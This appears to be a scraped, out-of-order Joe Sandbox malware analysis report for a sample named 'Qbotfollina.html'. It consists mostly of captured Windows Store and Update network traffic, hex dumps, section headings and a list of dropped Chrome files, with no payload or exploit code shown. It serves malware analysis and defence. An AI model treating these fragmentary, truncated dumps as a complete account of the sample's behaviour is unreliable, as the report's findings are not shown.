2022-06-08 07:57:01 UTC	9512	IN	Data Raw: 00 00 00 15 c5 e7 6b 9e 02 9b 49 99 00 00 00 00 00 15 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 32 30 30 06 03 55 04 03 13 29 4d 69 63 72 6f 73 6f 66 74 20 52 6f 6f 74 20 43 65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 20 32 30 31 30 30 1e 17 0d 32 31 30 39 33 30 31 38 32 32 32 35 5a 17 0d 33 30 30 39 33 30 31 38 33 32 32 35 5a 30 7c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d Data Ascii: kI0*H010UUS10UWashington10URedmond10UMicrosoft Corporation1200U)Microsoft Root Certificate Authority 20100210930182225Z300930183225Z0\|10UUS10UWashington10URedm

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:01 UTC	9515	OUT	GET /v1/a/impression?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&bSrc=i.t&time=20220608T165625Z&asid=57d951360cdd4c8fac5a233947b0e595&eid= HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2022-06-08 07:57:01 UTC	9516	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: 97eadcbc-7d5c-4e79-ae0f-43731e59ab0d Date: Wed, 08 Jun 2022 07:57:00 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:53:54 UTC	129	OUT	GET /image/apps.20893.13571498826857201.00a9d390-581f-492c-b148-b2ce81649480.acc28f88-50de-4aaf-abfc-ad1da8b04cd0?format=source HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 Host: store-images.s-microsoft.com Connection: Keep-Alive
2022-06-08 07:53:54 UTC	141	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=7776000, s-maxage=7776000 Content-Length: 2626 Content-Type: image/png Last-Modified: Mon, 30 Aug 2021 15:07:35 GMT Accept-Ranges: none ETag: W/"AEBa1e7txn2TDYI5ywciWaE/GFaMMdQgMHg4RDk2QkM3RTY2MTJGOUU" MS-CV: 43KkWTor8EuznZWC.0 Access-Control-Expose-Headers: MS-CV Date: Wed, 08 Jun 2022 07:53:54 GMT Connection: close Access-Control-Allow-Origin: *
2022-06-08 07:53:54 UTC	141	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 03 00 00 00 4e a3 7e 47 00 00 02 d3 50 4c 54 45 1d b9 54 23 ba 58 35 c0 66 48 c6 74 54 ca 7e 5f cd 86 6a d1 8f 70 d2 93 73 d3 95 77 d5 98 75 d4 97 72 d3 94 6e d2 91 66 cf 8b 5b cc 82 50 c8 7a 41 c4 6f 2f be 62 1e b9 55 39 c1 69 6d d1 91 99 df b1 c1 ec d0 e9 f8 ee ff ff ff fb fd fc db f4 e4 b2 e7 c5 8a da a6 5a cb 82 28 bc 5c af e6 c2 e7 f7 ed fd fe fd d4 f1 de 97 de b0 56 ca 7f 22 ba 58 33 bf 64 7d d6 9d c9 ee d6 fe fe fe f3 fb f6 ae e6 c1 61 ce 87 20 ba 56 63 ce 89 bd ea cd ef fa f2 9c e0 b4 43 c4 70 2b bd 5e 86 d9 a3 e7 f7 ec c7 ed d4 60 cd 86 2d be 60 96 de af f4 fb f6 6b d1 8f 27 bc 5c 90 dc ab d8 f3 e2 63 ce 88 e8 f8 ee c4 ec d2 44 c5 72 42 c4 70 cc ef d8 fc fe fc 98 df b1 25 Data Ascii: PNGIHDR,,N~GPLTET#X5fHtT~_jpswurnf[PzAo/bU9imZ(\V"X3d}a VcCp+^`-`k'\cDrBp%

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:01 UTC	9528	OUT	GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ3P2&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165631Z HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2022-06-08 07:57:01 UTC	9557	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: 9b9bb6ac-4b61-4ab7-855a-fa44b6ee8cb9 Date: Wed, 08 Jun 2022 07:57:01 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:01 UTC	9588	OUT	GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH5FV99&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165632Z HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2022-06-08 07:57:01 UTC	9588	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: da2d9332-a7cf-4983-a9bd-554fd9949e69 Date: Wed, 08 Jun 2022 07:57:01 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:02 UTC	9589	OUT	GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81 Host: sls.update.microsoft.com
2022-06-08 07:57:02 UTC	9590	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "AIP0MQaCzKwF3Wv0wR/DNwKKGDF7CierFQWSKotQHD4=_1440" MS-CorrelationId: fe5926c5-b371-42cf-a2dc-20284a655797 MS-RequestId: 7210758a-ee98-4b70-9c54-328e85cc8aa6 MS-CV: Rs0Sha9z7UK+/dHM.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 08 Jun 2022 07:57:01 GMT Connection: close Content-Length: 35877
2022-06-08 07:57:02 UTC	9591	IN	Data Raw: 4d 53 43 46 00 00 00 00 a5 42 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 0b 87 00 00 14 00 00 00 00 00 10 00 a5 42 00 00 80 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 26 64 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 5a 10 09 f7 39 42 26 64 43 4b ed bd 05 54 5c 5b ba 2d 5c 14 ee ee 1a 08 6e 85 3b 04 0f 1a dc 25 b8 bb 04 97 c2 83 07 09 ee 4e 70 77 09 4e 70 82 05 08 ae 09 ae 21 81 07 c9 91 f4 e9 d3 dd b7 ef ff fa bf fd ee e8 1a 83 aa bd 74 af b5 f6 fa d6 fc be b9 e7 18 c8 29 8b 4a 00 ee 3f ed 04 80 ef 1f b1 1f 3f 00 48 08 08 00 04 00 0a a0 cd 05 00 60 7d cf 41 fb 5e c7 5c 0a f0 db c7 f8 fe ef a1 56 08 3b e0 a7 8f 1f c0 c4 d6 d5 c2 d1 ce d6 c6 c4 d6 99 c9 cd c6 1a e0 3a 60 5b Data Ascii: MSCFBDBId&denvironment.cabZ9B&dCKT\[-\n;%NpwNp!t)J??H`}A^\V;:`[
2022-06-08 07:57:02 UTC	9606	IN	Data Raw: 2c d5 6c a1 e1 97 4f eb 44 d5 d7 31 d1 59 e6 ed 3c 5c f9 e0 bb 34 e4 d4 f6 e5 cf 75 58 d3 7b f1 91 6f 63 a0 cc f4 c4 a6 ab e5 3a e6 92 72 35 5d 84 ce 74 71 d7 d8 f2 ba fb 90 60 ef 04 55 ed e4 64 b9 d4 aa be 35 95 a4 1a 76 94 4a 12 1a 5e d7 70 59 b4 d9 77 7c b8 ec c5 58 bc 81 dc c9 78 5c a5 6d e9 71 c6 e6 a6 15 ed 41 c6 a2 49 2e 32 71 f5 02 07 81 2e 44 1d 42 3d 03 1e a8 78 29 eb e9 65 da ba 86 6b 80 8f 49 2f fa a5 f3 e4 23 e2 fa 9b 83 90 04 f1 75 8a 79 10 c7 93 b7 8f fd 33 4b 03 4f 6b 0f 28 5b b8 32 4e 01 84 ef 42 1d 15 9c 9d 65 dd ca 7a 61 a0 dc bc b3 99 e5 39 00 ce 79 0a 31 d9 aa a7 56 81 87 c8 58 ac 9e 24 94 e7 37 68 95 73 e7 82 04 da c4 25 9d d2 29 a9 f3 9e 78 2e 57 90 a6 a6 93 ee e7 d9 05 1d 46 b8 6c d4 8d 70 2a 62 4a f8 14 89 cc 10 48 bd 5d 96 50 46 Data Ascii: ,lOD1Y<\4uX{oc:r5]tq`Ud5vJ^pYw\|Xx\mqAI.2q.DB=x)ekI/#uy3KOk([2NBeza9y1VX$7hs%)x.WFlp*bJH]PF
2022-06-08 07:57:02 UTC	9622	IN	Data Raw: 00 00 00 15 c5 e7 6b 9e 02 9b 49 99 00 00 00 00 00 15 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 32 30 30 06 03 55 04 03 13 29 4d 69 63 72 6f 73 6f 66 74 20 52 6f 6f 74 20 43 65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 20 32 30 31 30 30 1e 17 0d 32 31 30 39 33 30 31 38 32 32 32 35 5a 17 0d 33 30 30 39 33 30 31 38 33 32 32 35 5a 30 7c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d Data Ascii: kI0*H010UUS10UWashington10URedmond10UMicrosoft Corporation1200U)Microsoft Root Certificate Authority 20100210930182225Z300930183225Z0\|10UUS10UWashington10URedm

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Qbotfollina.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

System Summary

Persistence and Installation Behavior

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic

C:\Users\user\AppData\Local\Google\Chrome\User Data\05ecd3b2-b9b6-4615-8da0-61857a45cdbb.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\1407162b-46f0-4f86-8672-b5bb5d6ef13e.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\148d2889-8d30-44d4-8b25-4acd45abbdd3.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\22104b31-e7f3-42fe-ad8e-a4890f404a1e.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\2bb3990c-e433-4e80-a92c-453c97f30a33.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\436c5d5e-dce5-4ed3-9529-765857d0ba82.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\546a1457-cc3f-4ec7-a92d-dc6c5a1d149a.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\5f2afbfc-f571-4e9f-9e57-9d743522af41.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\6f7f3e68-bf64-43fd-98fc-50372da0d07f.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\26ef0a44-1c96-421c-9319-03902ef14b1f.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\48c73de8-0090-4d04-9af6-227975bb8e5b.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\583af293-61ac-4894-a1f4-ebafda79de76.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\58592cb6-dd63-4405-a017-84c936c34d16.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\654a6c14-ca9a-428c-b8ac-1b1d127e1439.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6915fb29-f050-4a9c-a545-a34bad3e8ebf.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9bd124a4-8996-43ba-9d32-27257daa4c0d.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9f7bdcb5-c04d-4e05-b56c-8c6bb7a0b482.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache

Windows Analysis Report
Qbotfollina.html

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:02 UTC	9626	OUT	GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NCBCSZSJRSB&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165635Z HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2022-06-08 07:57:02 UTC	9626	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: 30dbe3a1-a869-4e51-a529-89334e233ee7 Date: Wed, 08 Jun 2022 07:57:01 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:02 UTC	9627	OUT	GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NMPJ99VJBWV&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165635Z HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2022-06-08 07:57:02 UTC	9627	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: 7cd3fc57-88d7-420a-8e41-b164b29097f7 Date: Wed, 08 Jun 2022 07:57:01 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:02 UTC	9628	OUT	GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH5FV99&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165636Z HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2022-06-08 07:57:02 UTC	9664	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: 902fe990-61ce-4572-a764-141d42588d83 Date: Wed, 08 Jun 2022 07:57:02 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:53:54 UTC	144	OUT	GET /image/apps.49525.13510798887047136.8a1815b2-017c-48c8-80cc-ca4d1ae5c8cf.2f6b9bdf-a4fc-42d8-aea0-65c437755b78?format=source HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 Host: store-images.s-microsoft.com Connection: Keep-Alive
2022-06-08 07:53:54 UTC	145	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=7776000, s-maxage=7776000 Content-Length: 5777 Content-Type: image/png Last-Modified: Tue, 31 Mar 2020 18:42:54 GMT Accept-Ranges: none ETag: W/"AEBa1e7txn2TDYI5ywciWaE/GFaMMdQgMHg4RDdENUEzNTJCQjJGM0E" MS-CV: sE5KrZztTESl/Nvr.0 Access-Control-Expose-Headers: MS-CV Date: Wed, 08 Jun 2022 07:53:54 GMT Connection: close Access-Control-Allow-Origin: *
2022-06-08 07:53:54 UTC	145	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8e 00 00 00 8e 08 06 00 00 00 e7 fd 30 08 00 00 16 58 49 44 41 54 78 da ed 9d 0b 98 14 d5 95 c7 4f 55 77 cf 7b 98 27 30 03 0c 32 c0 3c 18 90 a7 02 22 2a 88 1a 5f 49 4c 76 e5 e9 aa c9 ae df ba 8b 49 24 a2 0b 7c 01 8c 51 3f 13 35 2a 2a ba 26 ab 44 57 d7 90 20 a0 e8 b2 20 a2 2c a0 3c 8d b0 40 90 37 01 86 d7 cc 30 d3 33 d3 ef 5b 5b 55 53 d5 73 eb d6 bd 55 d5 f8 98 ae ee 7b f9 ee d7 5d d3 35 35 dd 75 7f fd 3f ff 73 4e 75 23 02 1f 7c 5c c4 10 f9 29 e0 83 83 c3 07 07 87 0f 0e 0e 1f 1c 1c 3e f8 e0 e0 f0 c1 c1 e1 83 83 c3 07 07 87 0f 0e 0e 1f 7c 70 70 f8 e0 e0 f0 c1 c1 e1 83 83 c3 07 07 87 0f 3e 38 38 7c 70 70 f8 e0 e0 f0 c1 c1 e1 83 83 c3 07 3e 04 9b c9 c1 e1 83 0a ca d7 bd 3f 07 27 45 61 f9 ba 8e c5 c1 49 Data Ascii: PNGIHDR0XIDATxOUw{'02<"_ILvI$\|Q?5*&DW ,<@703[[USsU{]55u?sNu#\|\)>\|pp>88\|pp>?'EaI

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:03 UTC	9664	OUT	GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRDFNG7&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165636Z HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2022-06-08 07:57:03 UTC	9664	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: 0276c136-f0ba-4290-8e35-a20fa6d20df3 Date: Wed, 08 Jun 2022 07:57:03 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:03 UTC	9665	OUT	GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=6F71D7A7.HotspotShieldFreeVPN_nsbqstbb9qxb6&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: Install Service MS-CV: 5KCV/ucurkKWj1DM.0.2.4 Host: displaycatalog.mp.microsoft.com
2022-06-08 07:57:03 UTC	9665	IN	HTTP/1.1 200 OK Connection: close Date: Wed, 08 Jun 2022 07:57:03 GMT Content-Type: application/json; charset=utf-8 Server: Kestrel Transfer-Encoding: chunked Vary: Authorization MS-CorrelationId: 8562d61e-baf5-4469-b827-64a7192d21c8 MS-RequestId: caaca99d-9abe-4916-a0a8-7c7af852d070 MS-CV: 5KCV/ucurkKWj1DM.0.2.4.1227127224.0.1.1227127224.0.0 X-Content-Type-Options: nosniff MS-ServerId: cf5cdc-qtv8h Region: neu Node: aks-bigcatrpns-32351330-vmss00001b MS-DocumentVersions: 9WZDNCRDFNG7\|3734
2022-06-08 07:57:03 UTC	9666	IN	Data Raw: 62 66 31 63 0d 0a 7b 22 42 69 67 49 64 73 22 3a 5b 22 39 57 5a 44 4e 43 52 44 46 4e 47 37 22 5d 2c 22 48 61 73 4d 6f 72 65 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 50 72 6f 64 75 63 74 73 22 3a 5b 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 30 34 2d 32 37 54 32 31 3a 32 36 3a 30 31 2e 32 32 30 37 33 32 35 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 46 72 61 6e 63 68 69 73 65 73 22 3a 5b 5d 2c 22 49 6d 61 67 65 73 22 3a 5b 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 36 37 35 35 37 30 30 32 39 37 33 30 31 31 35 32 30 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 23 30 33 31 38 33 37 22 2c Data Ascii: bf1c{"BigIds":["9WZDNCRDFNG7"],"HasMorePages":false,"Products":[{"LastModifiedDate":"2022-04-27T21:26:01.2207325Z","LocalizedProperties":[{"Franchises":[],"Images":[{"FileId":"3067557002973011520","EISListingIdentifier":null,"BackgroundColor":"#031837",
2022-06-08 07:57:03 UTC	9669	IN	Data Raw: 2d 38 34 65 30 2d 65 34 34 38 37 38 37 65 39 37 32 65 2e 37 33 35 61 62 39 30 64 2d 35 38 31 37 2d 34 35 36 38 2d 39 64 62 64 2d 31 65 31 31 61 66 33 62 62 61 39 31 22 2c 22 57 69 64 74 68 22 3a 32 31 36 30 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 32 30 30 30 30 30 30 30 30 30 30 35 36 35 36 39 38 34 33 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 23 30 33 31 38 33 37 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 32 37 35 31 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 33 30 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 Data Ascii: -84e0-e448787e972e.735ab90d-5817-4568-9dbd-1e11af3bba91","Width":2160},{"FileId":"2000000000056569843","EISListingIdentifier":null,"BackgroundColor":"#031837","Caption":"","FileSizeInBytes":12751,"ForegroundColor":"","Height":300,"ImagePositionInfo":"","I
2022-06-08 07:57:03 UTC	9673	IN	Data Raw: 72 5c 6e 5c 72 5c 6e 48 6f 74 73 70 6f 74 20 53 68 69 65 6c 64 20 56 50 4e 20 50 72 65 6d 69 75 6d 20 73 65 72 76 69 63 65 20 69 6e 63 6c 75 64 65 73 3a 5c 72 5c 6e 5c 72 5c 6e 2d 20 37 2d 64 61 79 20 66 72 65 65 20 74 72 69 61 6c 3a 20 66 72 65 65 20 6f 66 20 63 68 61 72 67 65 3b 20 6e 6f 20 63 6f 6d 6d 69 74 6d 65 6e 74 3b 20 63 61 6e 63 65 6c 20 61 6e 79 74 69 6d 65 2e 5c 72 5c 6e 2d 20 50 61 79 6d 65 6e 74 20 77 69 6c 6c 20 62 65 20 63 68 61 72 67 65 64 20 74 6f 20 79 6f 75 72 20 4d 69 63 72 6f 73 6f 66 74 20 53 74 6f 72 65 20 61 63 63 6f 75 6e 74 20 61 74 20 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 20 6f 66 20 70 75 72 63 68 61 73 65 2e 5c 72 5c 6e 2d 20 53 75 62 73 63 72 69 70 74 69 6f 6e 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 72 65 6e 65 77 73 20 Data Ascii: r\n\r\nHotspot Shield VPN Premium service includes:\r\n\r\n- 7-day free trial: free of charge; no commitment; cancel anytime.\r\n- Payment will be charged to your Microsoft Store account at confirmation of purchase.\r\n- Subscription automatically renews
2022-06-08 07:57:03 UTC	9677	IN	Data Raw: 72 6f 64 75 63 74 54 79 70 65 22 3a 22 41 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 56 61 6c 69 64 61 74 69 6f 6e 44 61 74 61 22 3a 7b 22 50 61 73 73 65 64 56 61 6c 69 64 61 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 52 65 76 69 73 69 6f 6e 49 64 22 3a 22 32 30 32 32 2d 30 34 2d 32 37 54 32 31 3a 32 36 3a 35 39 2e 33 39 32 38 31 31 36 5a 7c 7c 2e 7c 7c 62 33 36 63 63 35 34 61 2d 36 66 32 65 2d 34 32 61 62 2d 61 37 62 37 2d 35 32 30 62 61 64 33 62 65 66 30 66 7c 7c 31 31 35 32 39 32 31 35 30 35 36 39 34 33 38 30 31 37 39 7c 7c 4e 75 6c 6c 7c 7c 66 75 6c 6c 72 65 6c 65 61 73 65 22 2c 22 56 61 6c 69 64 61 74 69 6f 6e 52 65 73 75 6c 74 55 72 69 22 3a 22 22 7d 2c 22 4d 65 72 63 68 61 6e 64 69 7a 69 6e 67 54 61 67 73 22 3a 5b 5d 2c 22 50 61 72 74 44 22 3a 22 22 2c 22 Data Ascii: 